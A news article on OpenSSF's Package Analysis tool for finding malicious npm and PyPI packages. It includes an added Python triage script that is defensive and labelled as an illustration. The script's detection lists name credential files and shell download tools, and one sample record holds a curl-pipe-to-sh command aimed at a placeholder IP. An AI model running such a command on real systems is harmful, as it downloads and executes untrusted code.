Open source 'Package Analysis' tool finds malicious npm, PyPI packages
The Open Source Security Foundation (OpenSSF), a Linux Foundation-backed initiative, has released the first prototype version of its 'Package Analysis' tool, which aims to catch and counter malicious packages uploaded to open source registries.
In a pilot run that lasted less than a month, the open source project, released on GitHub, identified over 200 malicious npm and PyPI packages.
The project repository contains tools that analyze open source packages, in particular to hunt for malicious npm and PyPI packages.
"The Package Analysis project seeks to understand the behavior and capabilities of packages available on open source repositories: what files do they access, what addresses do they connect to, and what commands do they run?" explain Caleb Brown and David A. Wheeler, who are involved in OpenSSF's Securing Critical Projects working group.
In its test run that lasted under a month, Package Analysis was able to identify more than 200 malicious PyPI and npm components, according to OpenSSF. The vast majority of these malicious packages, says OpenSSF, are dependency confusion and typosquatting attacks.
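The three questions quoted above (which files a package touches, which addresses it connects to, which commands it runs) together with the two attack classes named here (typosquatting and dependency confusion) map naturally onto a small triage rule set. The following Python script is an added example written for this page, not code from the OpenSSF Package Analysis project: the record layout (`files`, `addresses`, `commands`), the popular-name and internal-name lists, the expected registry hosts, the similarity cutoff and the sample observations are all constructed assumptions for illustration.

```python
"""Toy triage of package-analysis style observations.

Added example, not the OpenSSF Package Analysis code. The record shape,
the reference lists, the thresholds and the sample records are all
assumptions constructed for this illustration.
"""
import difflib
from dataclasses import dataclass, field

# Constructed stand-in for "well-known package names" that a typosquat imitates.
POPULAR = {"requests", "numpy", "lodash", "express", "urllib3"}
# Constructed stand-in for an organisation's private package names; seeing one of
# these published on a public registry is the dependency-confusion signal.
INTERNAL = {"acme-auth", "acme-billing"}
# Hosts a legitimate install is expected to contact (assumption for this example).
EXPECTED_HOSTS = {"registry.npmjs.org", "pypi.org", "files.pythonhosted.org"}
# Paths and command fragments that are unusual during a package install.
SENSITIVE_PATHS = ("/etc/passwd", "/.ssh/", "/.aws/", "/.npmrc", "/.pypirc")
SHELL_DOWNLOADERS = ("curl ", "wget ", "nc ", "bash -c")


@dataclass
class Observation:
    """One package's sandbox observations (assumed record shape)."""
    name: str
    ecosystem: str
    files: list = field(default_factory=list)
    addresses: list = field(default_factory=list)
    commands: list = field(default_factory=list)


def typosquat_target(name, candidates=POPULAR, cutoff=0.8):
    """Return the popular name this one closely imitates, or None if it is
    either an exact popular name or not similar enough to any of them."""
    if name in candidates:
        return None
    matches = difflib.get_close_matches(name, candidates, n=1, cutoff=cutoff)
    return matches[0] if matches else None


def triage(obs):
    """Return a list of human-readable findings for one observation record."""
    findings = []
    target = typosquat_target(obs.name)
    if target:
        findings.append(f"typosquat: '{obs.name}' resembles '{target}'")
    if obs.name in INTERNAL:
        findings.append(
            f"dependency confusion: internal name '{obs.name}' seen on public {obs.ecosystem}")
    for path in obs.files:
        if any(s in path for s in SENSITIVE_PATHS):
            findings.append(f"sensitive file access: {path}")
    for addr in obs.addresses:
        host = addr.rsplit(":", 1)[0]          # strip the port
        if host not in EXPECTED_HOSTS:
            findings.append(f"unexpected network destination: {addr}")
    for cmd in obs.commands:
        if any(tok in cmd for tok in SHELL_DOWNLOADERS):
            findings.append(f"suspicious install-time command: {cmd}")
    return findings


def sample_observations():
    """Constructed sample records: one typosquat with bad behaviour,
    one benign install, one internal name on a public registry."""
    return [
        Observation("requestss", "pypi",
                    files=["/home/user/.ssh/id_rsa"],
                    addresses=["203.0.113.7:443"],
                    commands=["bash -c 'curl http://203.0.113.7/x | sh'"]),
        Observation("numpy", "pypi",
                    files=["/tmp/pip-build/numpy/setup.py"],
                    addresses=["pypi.org:443"],
                    commands=["python setup.py install"]),
        Observation("acme-auth", "npm"),
    ]


if __name__ == "__main__":
    for obs in sample_observations():
        print(obs.ecosystem, obs.name, "->", triage(obs) or ["no findings"])
```

The similarity test uses `difflib` ratio rather than an edit-distance library so the script runs with the standard library only; in a real pipeline the reference lists would come from registry download statistics and the organisation's private index, and the behaviour rules from the sandbox's own output schema.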
"There are lots of opportunities for involvement with this project, and we welcome anyone interested in contributing to the future goals of... detecting differences in package behavior over time; automating the processing of the Package Analysis results; storing the packages themselves as they are processed for long-term analysis; and improving the reliability of the pipeline."